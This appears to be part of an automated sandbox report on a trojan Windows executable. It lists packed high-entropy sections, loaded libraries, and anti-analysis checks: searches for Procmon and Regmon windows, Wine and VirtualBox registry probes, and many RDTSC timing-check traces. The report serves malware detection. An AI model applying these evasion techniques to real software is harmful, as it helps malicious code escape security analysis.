              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00746D951_2_00746D95
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0073E6701_2_0073E670
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00719E291_2_00719E29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074AF461_2_0074AF46
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074879A1_2_0074879A
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00394A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: nflvzldk ZLIB complexity 0.9946585036524712
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_003B3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003ACAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_003ACAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\40PEVZBY.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 42%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1753088 > 1048576
              Source: file.exeStatic PE information: Raw size of nflvzldk is bigger than: 0x100000 < 0x192200

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.390000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nflvzldk:EW;tlfgsqna:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nflvzldk:EW;tlfgsqna:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_003B6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b213e should be: 0x1b3d7d
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: nflvzldk
              Source: file.exeStatic PE information: section name: tlfgsqna
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00842093 push 2E8BAA80h; mov dword ptr [esp], ebp1_2_008420BF
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007D7062 push ebx; mov dword ptr [esp], 37FED661h1_2_007D7099
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007D7062 push edi; mov dword ptr [esp], 6FFFD3C1h1_2_007D70FD
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007D7062 push esi; mov dword ptr [esp], edx1_2_007D715E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push 441A6813h; mov dword ptr [esp], ebp1_2_007458B2
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push edi; mov dword ptr [esp], ecx1_2_007458F9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push 16E8D9CDh; mov dword ptr [esp], ebp1_2_00745924
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push 75011ABDh; mov dword ptr [esp], edi1_2_00745B0B
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push eax; mov dword ptr [esp], 258A6113h1_2_00745C24
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push 2FE42D76h; mov dword ptr [esp], eax1_2_00745C34
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push ebx; mov dword ptr [esp], 36075421h1_2_00745CE8
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push 68440814h; mov dword ptr [esp], ebp1_2_00745CF7
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push ebx; mov dword ptr [esp], 597B6BBFh1_2_00745D85
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push edx; mov dword ptr [esp], ebx1_2_00745DB5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push 3A5E8B8Ch; mov dword ptr [esp], esi1_2_00745DE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push edx; mov dword ptr [esp], 3D639466h1_2_00745EA9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push edi; mov dword ptr [esp], ebx1_2_00745EE6
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push edi; mov dword ptr [esp], 711FDA71h1_2_00745F49
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push edi; mov dword ptr [esp], 04750955h1_2_00746005
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push 2FC42A91h; mov dword ptr [esp], ecx1_2_0074601D
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push ebp; mov dword ptr [esp], esi1_2_00746021
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push esi; mov dword ptr [esp], eax1_2_0074603E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push ebp; mov dword ptr [esp], 7DFF3AFFh1_2_00746089
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push 42D6F273h; mov dword ptr [esp], eax1_2_007460A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push edi; mov dword ptr [esp], 00000000h1_2_0074616E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push eax; mov dword ptr [esp], ecx1_2_007461C9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push edx; mov dword ptr [esp], 5F6EF3E0h1_2_007461FD
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push edi; mov dword ptr [esp], 64B57B11h1_2_007462E4
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push ebx; mov dword ptr [esp], esi1_2_00746328
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push 5C4D1604h; mov dword ptr [esp], ebx1_2_0074639E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push 5C0D1BBBh; mov dword ptr [esp], ecx1_2_00746475
              Source: file.exeStatic PE information: section name: nflvzldk entropy: 7.9535417712183945

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_003B6390

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-26082
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DF8C5 second address: 5DF8C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74FE7F second address: 74FE94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Bh 0x00000007 jg 00007F63C8B57C1Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75270D second address: 75275C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1C60h], ecx 0x00000010 push 00000000h 0x00000012 mov esi, dword ptr [ebp+122D2F62h] 0x00000018 call 00007F63C8D82F49h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F63C8D82F56h 0x00000025 jmp 00007F63C8D82F54h 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75275C second address: 7527AA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F63C8B57C18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F63C8B57C20h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jo 00007F63C8B57C32h 0x0000001a jp 00007F63C8B57C2Ch 0x00000020 jmp 00007F63C8B57C26h 0x00000025 mov eax, dword ptr [eax] 0x00000027 push edi 0x00000028 jp 00007F63C8B57C1Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7527AA second address: 7527B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7527B8 second address: 7527BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7527BC second address: 7527C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752920 second address: 7529CF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add dword ptr [ebp+122D1CA7h], edx 0x0000000f push 00000000h 0x00000011 jnc 00007F63C8B57C19h 0x00000017 push 12B62B16h 0x0000001c jnp 00007F63C8B57C22h 0x00000022 xor dword ptr [esp], 12B62B96h 0x00000029 or dword ptr [ebp+122D34BDh], edi 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F63C8B57C18h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b sub edi, dword ptr [ebp+122D2BE7h] 0x00000051 xor esi, dword ptr [ebp+122D2C67h] 0x00000057 push 00000000h 0x00000059 add dh, FFFFFF9Ah 0x0000005c push 00000003h 0x0000005e jmp 00007F63C8B57C1Fh 0x00000063 call 00007F63C8B57C19h 0x00000068 jg 00007F63C8B57C20h 0x0000006e jmp 00007F63C8B57C1Ah 0x00000073 push eax 0x00000074 push edi 0x00000075 push edi 0x00000076 jc 00007F63C8B57C16h 0x0000007c pop edi 0x0000007d pop edi 0x0000007e mov eax, dword ptr [esp+04h] 0x00000082 push edx 0x00000083 pushad 0x00000084 push edx 0x00000085 pop edx 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7529CF second address: 752A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 ja 00007F63C8D82F50h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jnl 00007F63C8D82F4Ah 0x00000018 push esi 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c pop eax 0x0000001d adc si, 1CA7h 0x00000022 lea ebx, dword ptr [ebp+124465BFh] 0x00000028 jno 00007F63C8D82F4Ch 0x0000002e xchg eax, ebx 0x0000002f jmp 00007F63C8D82F4Ch 0x00000034 push eax 0x00000035 push eax 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752B11 second address: 752B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752B15 second address: 752B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752B1B second address: 752B35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752B35 second address: 752B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752B4B second address: 752B7B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F63C8B57C1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F63C8B57C28h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752B7B second address: 752B81 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752B81 second address: 752B90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752B90 second address: 752BE7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F63C8D82F46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jbe 00007F63C8D82F5Ch 0x00000015 jl 00007F63C8D82F56h 0x0000001b jmp 00007F63C8D82F50h 0x00000020 pop eax 0x00000021 jmp 00007F63C8D82F53h 0x00000026 lea ebx, dword ptr [ebp+124465CAh] 0x0000002c xor dword ptr [ebp+122D1B2Dh], edi 0x00000032 mov edx, dword ptr [ebp+122D2AB3h] 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752BE7 second address: 752BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744CFD second address: 744D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F63C8D82F56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770CA1 second address: 770CA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770F6F second address: 770F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F63C8D82F46h 0x0000000a jmp 00007F63C8D82F55h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770F90 second address: 770FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F63C8B57C1Dh 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770FA6 second address: 770FAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770FAA second address: 770FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770FB0 second address: 770FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F63C8D82F4Dh 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F63C8D82F46h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770FD2 second address: 770FD8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770FD8 second address: 770FF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F54h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771636 second address: 77163A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771776 second address: 77177A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76860C second address: 76862A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F63C8B57C16h 0x0000000a jmp 00007F63C8B57C24h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B876 second address: 74B87A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B87A second address: 74B8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F63C8B57C30h 0x0000000c jmp 00007F63C8B57C24h 0x00000011 jg 00007F63C8B57C16h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B8A0 second address: 74B8BD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F63C8D82F53h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F63C8D82F4Bh 0x0000000f jbe 00007F63C8D82F4Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77225C second address: 772264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77272B second address: 772732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772732 second address: 772737 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772737 second address: 772743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F63C8D82F46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776409 second address: 77640F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74316F second address: 743173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743173 second address: 743192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F63C8B57C23h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DD15 second address: 77DD19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DD19 second address: 77DD1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DD1D second address: 77DD38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F63C8D82F53h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DEB3 second address: 77DEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F63C8B57C16h 0x0000000a popad 0x0000000b jmp 00007F63C8B57C26h 0x00000010 jnp 00007F63C8B57C1Eh 0x00000016 je 00007F63C8B57C16h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 ja 00007F63C8B57C16h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DEED second address: 77DEFB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007F63C8D82F46h 0x0000000d pop ecx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E072 second address: 77E092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F63C8B57C29h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E092 second address: 77E0AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F63C8D82F52h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E532 second address: 77E536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E536 second address: 77E549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F63C8D82F4Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E686 second address: 77E6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8B57C28h 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780CE8 second address: 780CEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780E68 second address: 780E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7817AB second address: 7817C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007F63C8D82F58h 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F63C8D82F46h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7817C0 second address: 7817C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7819A1 second address: 7819B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F63C8D82F4Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
